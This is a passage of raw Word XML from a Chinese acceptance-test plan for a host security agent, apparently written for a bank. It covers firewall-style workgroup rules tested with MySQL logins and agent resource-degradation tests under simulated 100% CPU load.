              <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:textAlignment w:val="top"/>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minor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left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="仿宋_GB2312"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="仿宋_GB2312"/>
                <w:lang w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>测试方法</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8013" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:textAlignment w:val="top"/>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>1. 新建策略集</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>test；</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:textAlignment w:val="top"/>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>2. 点击策略集详情，将工作组group1、group2添加至策略集</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>test的</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">覆盖范围 </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:textAlignment w:val="top"/>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>3. 将group1和group2开启防护模式</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:textAlignment w:val="top"/>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>4. 点击添加工作组内规则，允许角色web访问角色mysql的3306端口的mysql服务，并下发规则</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:textAlignment w:val="top"/>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>5. 在</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>Oracle-76-01</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>执行：mysql  -u root -p -h （</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Oracle-76-02</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>IP）,输入正确密码登录</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:textAlignment w:val="top"/>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>6. 将</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Oracle-76-02</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>修改至group1中</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:textAlignment w:val="top"/>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>7. 在</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>Oracle-76-01</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>执行：mysql  -u root -p -h （</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Oracle-76-02</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>IP）,输入正确密码登录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left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="仿宋_GB2312"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="仿宋_GB2312"/>
                <w:lang w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>预期结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8013" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:textAlignment w:val="top"/>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>结果1（步骤5）：使用</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>Oracle-76-01</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>访问Oracle-76-02的3306端口的mysql服务失败</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:textAlignment w:val="top"/>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>结果2（步骤7）：使用</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>Oracle-76-01</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="宋体" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>访问Oracle-76-02的3306端口的mysql服务成功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lang w:bidi="ar"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="仿宋_GB2312"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>测试工具</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8013" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:widowControl w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="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rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="仿宋_GB2312"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>测试记录</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8013" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:widowControl w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="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rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="仿宋_GB2312"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>测试结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8013" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:widowControl w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
                <w:color w:val="000000"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>口</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="Tahoma"/>
                <w:color w:val="000000"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
                <w:color w:val="000000"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>通过</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="Tahoma"/>
                <w:color w:val="000000"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve">   </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
                <w:color w:val="000000"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>口</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="Tahoma"/>
                <w:color w:val="000000"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
                <w:color w:val="000000"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>未通过</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="Tahoma"/>
                <w:color w:val="000000"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
                <w:color w:val="000000"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>口</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="Tahoma"/>
                <w:color w:val="000000"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
                <w:color w:val="000000"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>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left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="仿宋_GB2312"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="仿宋_GB2312"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8013" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:widowControl w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="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_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>人员签字</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="801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_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>建行：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>____________________</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">        厂商：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>____________________</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>非功能性指标</w:t>
      </w:r>
      <w:bookmarkEnd w:id="126"/>
      <w:bookmarkEnd w:id="127"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:bookmarkStart w:id="128" w:name="_Toc1255667163"/>
      <w:bookmarkStart w:id="129" w:name="_Toc26767"/>
      <w:r>
        <w:t>模拟CPU使用率高场景下，Agent资源使用情况</w:t>
      </w:r>
      <w:bookmarkEnd w:id="128"/>
      <w:bookmarkEnd w:id="129"/>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t>测试Agent在宿主机资源使用率极高的情况下的资源使用情况。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t>测试Agent在宿主机资源使用率极高的情况下，Agent是否会自动降级或自杀。当宿主机资源使用率恢复正常后，Agent是否会自动拉起自杀的进程。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t>多核心CPU使用率均达到100%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60"/>
              </w:numPr>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在服务端设置agent降级阈值为：系统多核CPU资源占用达到70%</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="50"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="60"/>
              </w:numPr>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在服务端设置agent自杀阈值为：系统多核CPU资源占用达到90%</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="50"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="60"/>
              </w:numPr>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">查看主机CPU的核心数: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>cat /proc/cpuinfo | grep "processor" | wc -l</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="50"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="60"/>
              </w:numPr>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:t>根据核心数启动模拟CPU使用率高的脚本，并记录开始时间: sh cpu_high.sh CPU核心数</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="50"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="60"/>
              </w:numPr>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:t>30分钟以后，读取Nmon的监控数据，检查进程和资源使用情况。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pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="61"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>控制</w:t>
            </w:r>
            <w:r>
              <w:t>CPU</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>单核</w:t>
            </w:r>
            <w:r>
              <w:t>使用率在10%以内</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>（允许3秒内的瞬间峰值波动）内存占用小于200MB。</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="61"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>随着CPU使用率的升高，</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:t>分钟内Agent会</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>自杀或</w:t>
            </w:r>
            <w:r>
              <w:t>自动降级（需证明降级日志）</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="61"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>当宿主机CPU使用率恢复正常后，3分钟内，能自动拉起自杀或降级的进程。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p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312"/>
              </w:rPr>
              <w:object>
